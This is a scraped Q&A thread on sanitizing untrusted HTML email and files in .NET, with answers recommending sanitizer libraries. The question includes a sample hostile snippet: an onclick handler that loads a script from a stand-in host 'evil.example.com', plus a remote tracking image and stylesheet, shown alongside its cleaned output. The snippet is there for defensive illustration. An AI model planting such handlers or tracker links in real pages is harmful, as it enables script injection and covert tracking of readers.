Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.

In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)

The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.

We recognize that some of this may well muck up the display of the text; that's okay.

We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).

The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.

What I've found so far:

  • The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
  • Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
  • The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
  • The Microsoft Anti-XSS library

What would you recommend for this task? One of the above? Something else?


For example, we want to remove things like:

  • script elements
  • link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
  • embed, object, applet, audio, video, and other tags that try to create objects
  • onclick and similar DOM0 event handler script code
  • hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
  • __________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)

So for instance, this HTML:

<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>

would become

<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>

(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)

like image 781
T.J. Crowder Avatar asked Dec 30 '10 10:12

T.J. Crowder


People also ask

How do I disinfect HTML content?

Sanitize a string immediatelysetHTML() is used to sanitize a string of HTML and insert it into the Element with an id of target . The script element is disallowed by the default sanitizer so the alert is removed.

When should you sanitize HTML?

HTML sanitization can be used to protect against attacks such as cross-site scripting (XSS) by sanitizing any HTML code submitted by a user.

Why do you need to sanitize HTML?

HTML sanitization offers a security mechanism to remove unsafe (and potentially malicious) content from untrusted raw HTML strings before presenting them to the user. The experimental, inbuilt browser Sanitization API helps you to insert untrusted HTML strings to your web application's DOM in a safe way.

What means sanitize HTML?

HTML sanitization is the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated “safe” and desired. HTML sanitization can be used to protect against cross-site scripting (XSS) attacks by sanitizing any HTML code submitted by a user.


4 Answers

This is an older, but still relevant question.

We are using the HtmlSanitizer .Net library, which:

  • is open-source
  • is actively maintained
  • doesn't have the problems like Microsoft Anti-XSS library,
  • Is unit tested with the OWASP XSS Filter Evasion Cheat Sheet
  • is special built for this (in contrast to HTML Agility Pack, which is a parser)

Also on NuGet

like image 175
Julian Avatar answered Oct 17 '22 08:10

Julian


I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.

See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.

like image 37
Aravind Yarram Avatar answered Oct 17 '22 07:10

Aravind Yarram


I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.

I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.

This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.

like image 2
Andrew T Finnell Avatar answered Oct 17 '22 09:10

Andrew T Finnell


I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.

like image 1
seth Avatar answered Oct 17 '22 07:10

seth